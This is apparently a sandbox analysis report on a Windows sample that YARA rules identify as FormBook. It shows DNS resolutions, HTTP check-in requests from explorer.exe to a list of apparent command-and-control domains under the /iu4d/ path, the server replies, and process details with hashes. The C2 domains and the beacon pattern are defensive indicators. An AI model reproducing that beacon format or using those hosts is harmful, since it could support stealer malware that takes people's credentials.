                                                              Apr 8, 2021 11:05:06.244898081 CEST8.8.8.8192.168.2.50x33eeNo error (0)www.aa29996.com147.255.37.207A (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:11.844794035 CEST8.8.8.8192.168.2.50x5155No error (0)www.ux300e.com52.58.78.16A (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:16.968993902 CEST8.8.8.8192.168.2.50x26e0No error (0)www.mvprunning.commvprunning.comCNAME (Canonical name)IN (0x0001)
                                                              Apr 8, 2021 11:05:16.968993902 CEST8.8.8.8192.168.2.50x26e0No error (0)mvprunning.com34.102.136.180A (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:22.213840961 CEST8.8.8.8192.168.2.50x3495No error (0)www.getboostphlo.com172.67.219.254A (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:22.213840961 CEST8.8.8.8192.168.2.50x3495No error (0)www.getboostphlo.com104.21.70.50A (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:27.993830919 CEST8.8.8.8192.168.2.50xfde6No error (0)www.okitmall.com15.165.26.252A (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:33.556996107 CEST8.8.8.8192.168.2.50x1b1bName error (3)www.morrealeestates.comnonenoneA (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:38.862267971 CEST8.8.8.8192.168.2.50xfc66No error (0)www.cqsjny.com198.148.114.222A (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:44.853007078 CEST8.8.8.8192.168.2.50x28d8No error (0)www.betbonusuk.com172.67.187.138A (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:44.853007078 CEST8.8.8.8192.168.2.50x28d8No error (0)www.betbonusuk.com104.21.7.67A (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:50.003463030 CEST8.8.8.8192.168.2.50x31e7No error (0)www.yashaerotech.comyashaerotech.comCNAME (Canonical name)IN (0x0001)
                                                              Apr 8, 2021 11:05:50.003463030 CEST8.8.8.8192.168.2.50x31e7No error (0)yashaerotech.com34.102.136.180A (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:05:55.490092039 CEST8.8.8.8192.168.2.50x67Server failure (2)www.gmopanama.comnonenoneA (IP address)IN (0x0001)
                                                              Apr 8, 2021 11:06:00.623815060 CEST8.8.8.8192.168.2.50x9958No error (0)www.adamspartnership.com138.197.103.178A (IP address)IN (0x0001)

                                                              HTTP Request Dependency Graph

                                                              • www.runcouver.com
                                                              • www.aa29996.com
                                                              • www.ux300e.com
                                                              • www.mvprunning.com
                                                              • www.getboostphlo.com
                                                              • www.okitmall.com
                                                              • www.cqsjny.com
                                                              • www.betbonusuk.com
                                                              • www.yashaerotech.com

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              0192.168.2.54971834.102.136.18080C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Apr 8, 2021 11:05:00.766391039 CEST1290OUTGET /iu4d/?AR6=C3lw6nN8/wjOPd8oaAysox0kMoLppKhEiaq8wux9+N+u3aHHhZKc4gso1l+tbzGLEbBg&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.runcouver.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Apr 8, 2021 11:05:00.881786108 CEST1291INHTTP/1.1 403 Forbidden
                                                              Server: openresty
                                                              Date: Thu, 08 Apr 2021 09:05:00 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 275
                                                              ETag: "606abe3b-113"
                                                              Via: 1.1 google
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              1192.168.2.549721147.255.37.20780C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Apr 8, 2021 11:05:06.474777937 CEST1337OUTGET /iu4d/?AR6=uttTwOCOH1jEV+6/PDkH2rgXUcJbpZgk8NMf80qhjrLzhrhL9Yums4YmXY+CUKk4Lsjl&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.aa29996.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Apr 8, 2021 11:05:06.645096064 CEST1338INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Thu, 08 Apr 2021 09:05:06 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 1.0


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              2192.168.2.54972752.58.78.1680C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Apr 8, 2021 11:05:11.863981009 CEST5003OUTGET /iu4d/?AR6=JvjSk9WUlBdgONG69H9sib5J4SPt/vPlwOmf1A06UqzVvRJVghpTE97et7kDme6aF6nY&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.ux300e.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Apr 8, 2021 11:05:11.881622076 CEST5003INHTTP/1.1 410 Gone
                                                              Server: openresty/1.13.6.2
                                                              Date: Thu, 08 Apr 2021 09:04:23 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 61 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 75 78 33 30 30 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 36 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 75 78 33 30 30 65 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 7<html>9 <head>4a <meta http-equiv='refresh' content='5; url=http://www.ux300e.com/' />a </head>9 <body>36 You are being redirected to http://www.ux300e.coma </body>8</html>0


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              3192.168.2.54972834.102.136.18080C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Apr 8, 2021 11:05:16.982394934 CEST5622OUTGET /iu4d/?AR6=7Tv9DsBa2x/9+7rHtb45a2p9TOUpHuLwXvGhoZyRj+FM5Jpy0KtmokI2zSCU3HKaraDa&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.mvprunning.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Apr 8, 2021 11:05:17.162631035 CEST5622INHTTP/1.1 403 Forbidden
                                                              Server: openresty
                                                              Date: Thu, 08 Apr 2021 09:05:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 275
                                                              ETag: "605e0bcb-113"
                                                              Via: 1.1 google
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              4192.168.2.549729172.67.219.25480C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Apr 8, 2021 11:05:22.258661032 CEST5624OUTGET /iu4d/?AR6=dTiXV4CFE3yVJbJPtbi4kS8L9e4gDLsfvJEyPJQwpK+wIZV6SF5bJNAnffOAlybNEFfC&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.getboostphlo.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Apr 8, 2021 11:05:22.638344049 CEST5625INHTTP/1.1 404 Not Found
                                                              Date: Thu, 08 Apr 2021 09:05:22 GMT
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: __cfduid=dfb3971d4184d632d73a1908cbee311771617872722; expires=Sat, 08-May-21 09:05:22 GMT; path=/; domain=.getboostphlo.com; HttpOnly; SameSite=Lax
                                                              CF-Cache-Status: DYNAMIC
                                                              cf-request-id: 095253b1640000a8c13d238000000001
                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2F802H7kHqNcGEaM19LIsT0HTjHrjpPBTypNS7vtOf80a0axYnOpC46oJeo%2FijRhoiKFT5as3D5%2FwxLegLD2FcS%2FMFN%2BWUhKGAQQySsVBK6%2BbwWISsw%3D%3D"}],"group":"cf-nel"}
                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                              Server: cloudflare
                                                              CF-RAY: 63ca55623926a8c1-CDG
                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                              Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 75 34 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                              Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /iu4d/ was not found on this server.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              5192.168.2.54973115.165.26.25280C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Apr 8, 2021 11:05:28.222840071 CEST5641OUTGET /iu4d/?AR6=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrA3L99pwBOY&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.okitmall.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Apr 8, 2021 11:05:28.450283051 CEST5644INHTTP/1.1 404 Not Found
                                                              Date: Thu, 08 Apr 2021 09:05:28 GMT
                                                              Server: Apache
                                                              X-Powered-By: PHP/5.6.36
                                                              X-Frame-Options: SAMEORIGIN
                                                              Cache-Control: No-Cache
                                                              Connection: close
                                                              Transfer-Encoding: chunked
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 31 65 30 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 72 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 33 36 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 20 2f 3e 0a 09 09 09 09 3c 74 69 74 6c 65 3e ed 86 b5 ed 95 a9 eb b3 b4 ed 97 98 20 eb b9 84 ea b5 90 ea b2 ac ec a0 81 ec 82 ac ec 9d b4 ed 8a b8 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 31 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 51 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2f 32 2e 30 2e 33 2f 6a 71 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 73 6f 6e 33 2f 33 2e 33 2e 32 2f 6a 73 6f 6e 33 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 20 20 20 20 20 20 24 66 6f 72 6d 20 3d 20 24 28 27 2e 70 75 72 65 2d 66 6f 72 6d 27 29 3b 0a 20 20 20 20 20 20 24 66 6f 72 6d 2e 73 75 62 6d 69 74 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 24 74 68 69 73 20 3d 20 24 28 74 68 69 73 29 3b 0a 0a 09 09 76 61 72 20 66 20 3d 20 74 68 69 73 3b 0a 0a 09 09 69 66 20 28 66 2e 61 67 72 65 65 2e 63 68 65 63 6b 65 64 20 3d 3d 20 66 61 6c 73 65 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ea b0 9c ec 9d b8 ec a0 95 eb b3 b4 ec b7 a8 ea b8 89 eb b0 a9 ec b9 a8 ec 97 90 20 eb 8f 99 ec 9d 98 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 61 67 72 65 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ec 9d b4 eb a6 84 ec 9d 84 20 ec 9e 85 eb a0 a5 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 20 20 20 20 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 62 69 72 74 68 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ec 83 9d eb 85 84 ec 9b 94 ec 9d bc ec 9d 84 20 ec 9e 85 eb a0 a5 ed 95 b4
                                                              Data Ascii: 1e04<!doctype html><html lang="kr"><head><meta name="viewport" content="width=360, user-scalable=no"><meta charset="UTF-8"><meta name="format-detection" content="telephone=no" /><title> </title><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jQuery.serializeObject/2.0.3/jquery.serializeObject.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/json3/3.3.2/json3.min.js"></script> <script type="text/javascript"> jQuery(function($) { $form = $('.pure-form'); $form.submit(function(e) { var $this = $(this);var f = this;if (f.agree.checked == false){alert(' .');f.agree.focus();return false;}if (f.customer_name.value == ""){alert(' .');f.customer_name.focus();return false;} if (f.customer_birth.value == ""){alert('


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              6192.168.2.549732198.148.114.22280C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Apr 8, 2021 11:05:39.640341043 CEST5670OUTGET /iu4d/?AR6=y4JxQtggtXVUGlOHrdhsWpYE5Q5QdQRqM5s9avj6g1ZOxqioacxcZohZ3CHAJSRBFHfe&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.cqsjny.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Apr 8, 2021 11:05:39.795466900 CEST5670INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Thu, 08 Apr 2021 08:57:53 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 162
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              7192.168.2.549735172.67.187.13880C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Apr 8, 2021 11:05:44.885164976 CEST5689OUTGET /iu4d/?AR6=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT09VD1VuWTt&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.betbonusuk.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Apr 8, 2021 11:05:44.938178062 CEST5690INHTTP/1.1 301 Moved Permanently
                                                              Date: Thu, 08 Apr 2021 09:05:44 GMT
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Thu, 08 Apr 2021 10:05:44 GMT
                                                              Location: https://www.betbonusuk.com/iu4d/?AR6=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT09VD1VuWTt&nflLiT=xPJxAxbPf
                                                              cf-request-id: 09525409c80000edd3948d6000000001
                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZF5J6NiyZJ1xWOxL1HbRgMnFhsl5L55L%2BmumTS%2F2zFKYcHwqadVLmwL5yKrJ9ELzoFLC7L7p%2FYsoGRwUdZAonvvH11mdTVYOHlAjMCxYfQqMn98%3D"}],"group":"cf-nel"}
                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                              Server: cloudflare
                                                              CF-RAY: 63ca55efaac0edd3-CDG
                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                              Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              8192.168.2.54973634.102.136.18080C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Apr 8, 2021 11:05:50.018143892 CEST5691OUTGET /iu4d/?AR6=a4TwvNFJUHZfYjxmJDGfKucvC3Kvi9GvZt2BYG7bsK78eAq1dsPAQngdGmiuB14d735P&nflLiT=xPJxAxbPf HTTP/1.1
                                                              Host: www.yashaerotech.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Apr 8, 2021 11:05:50.132699966 CEST5692INHTTP/1.1 403 Forbidden
                                                              Server: openresty
                                                              Date: Thu, 08 Apr 2021 09:05:50 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 275
                                                              ETag: "6063a886-113"
                                                              Via: 1.1 google
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                              Code Manipulations

                                                              Statistics

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              Analysis Process: hvEop8Y70Y.exe PID: 6364 Parent PID: 5660

                                                              General

                                                              Start time:11:03:54
                                                              Start date:08/04/2021
                                                              Path:C:\Users\user\Desktop\hvEop8Y70Y.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\Desktop\hvEop8Y70Y.exe'
                                                              Imagebase:0x8b0000
                                                              File size:652800 bytes
                                                              MD5 hash:BD7E988ED1D92F9FAF32F6A817D89329
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
                                                              Reputation:low

                                                              Analysis Process: hvEop8Y70Y.exe PID: 6668 Parent PID: 6364

                                                              General

                                                              Start time:11:04:05
                                                              Start date:08/04/2021
                                                              Path:C:\Users\user\Desktop\hvEop8Y70Y.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\Desktop\hvEop8Y70Y.exe
                                                              Imagebase:0x9a0000
                                                              File size:652800 bytes
                                                              MD5 hash:BD7E988ED1D92F9FAF32F6A817D89329
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
